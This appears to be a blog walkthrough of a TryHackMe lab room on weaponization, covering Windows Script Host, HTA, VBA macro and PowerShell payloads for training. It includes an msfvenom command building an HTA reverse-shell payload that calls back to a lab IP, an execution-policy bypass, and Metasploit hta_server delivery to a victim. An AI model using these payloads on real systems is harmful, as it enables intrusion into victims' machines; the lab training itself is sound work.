Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on. However, this room steps it up a bit and has us create payloads for exploiting machines. Consequently, i’m going to try and reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.
Weaponization Cyber Kill Chain
The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. Beneath, you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.
Furthermore, the room explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It then goes on to explain that some organizations block or monitor the execution of .exe files but that there are alternatives such as the ones listed below.
- The Windows Script Host (WSH)
- An HTML Application (HTA)
- Visual Basic Applications (VBA)
- PowerShell (PSH)
Windows Scripting Host Weaponization
Windows Operating Systems have a built-in tool to run batch files called Windows Scripting Host. Furthermore, this scripting host tool allows for the execution of certain scripts. The room challenges us to write a script that creates a context box that says “Welcome to THM”. This can be achieved with the following code which can then be double-clicked or run from the command line.
Dim message message = "Welcome to THM" MsgBox message
Next, the room challenges you to produce a script that can launch the calculator. This is fairly simple as it provides the script you need to run. However, it then asks you to produce a script to launch cmd.exe by telling you to replace calc.exe with cmd.exe. Although, it seems that this didn’t work for me. I did a bit of googling but didn’t find a solution.
Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
HTML Application Weaponization
HTML Applications are insanely cool. They allow you to create a file and host them on a web server for an unsuspecting victim to click and run. Therefore, if an unsuspecting victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and if run by a victim would open a command prompt.
<html> <body> <script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); </script> </body> </html>
Moreover, you can use msfvenom to create reverse shell payload HTA applications. Similarly, this can also be hosted on a web server and if run by the victim would grant the attacker access to their machine. For example, the code below can be used to create an HTA application with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
However, a far similar method of performing this type of attack is to the hta_server module in Metasploit. This module requires hardly any configuration and will automatically host the application for you. All the attacker would need to do is send the link to their victim and wait for them to run it.
Visual Basic for Application Weaponization
Visual Basic applications are another really cool way of delivering a payload. For example, Microsoft Office documents support macros which can be used to execute Visual Basic. Macros can be accessed by clicking View then macros. You then need to give the macro a name and the script to be executed. For example, the script below will run calc.exe.
Sub PoC() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
There is a lot more to this section which you should definitely read through but this covers the basics. This is something I will definitely be adding to my list of exploits as it is very powerful if you can trick a user into running macros.
PowerShell scripts are great for compromising machines. In fact, you can use PowerShell can execute a reverse shell directly or can download externally hosted payloads and execute that to create a reverse shell. However, one problem that we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.
powershell -ex bypass -File thm.ps1
Command And Control – (C2 Or C&C)
This section of the room covers information about C2’s or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is good to read through this information to reinforce what was learned in the C2 room. There are no questions to answer here.
This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present. It discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckys outside a police station. An officer picks up one of the USBs and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB rubber ducky then check out my guide on how to use a Digispark.
In order to complete the practice arena, I used the hta_server Metasploit module that was mentioned previously. Furthermore, It didn’t require any configuration, all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would however strongly encourage you to do this yourself rather than copying and pasting the answer.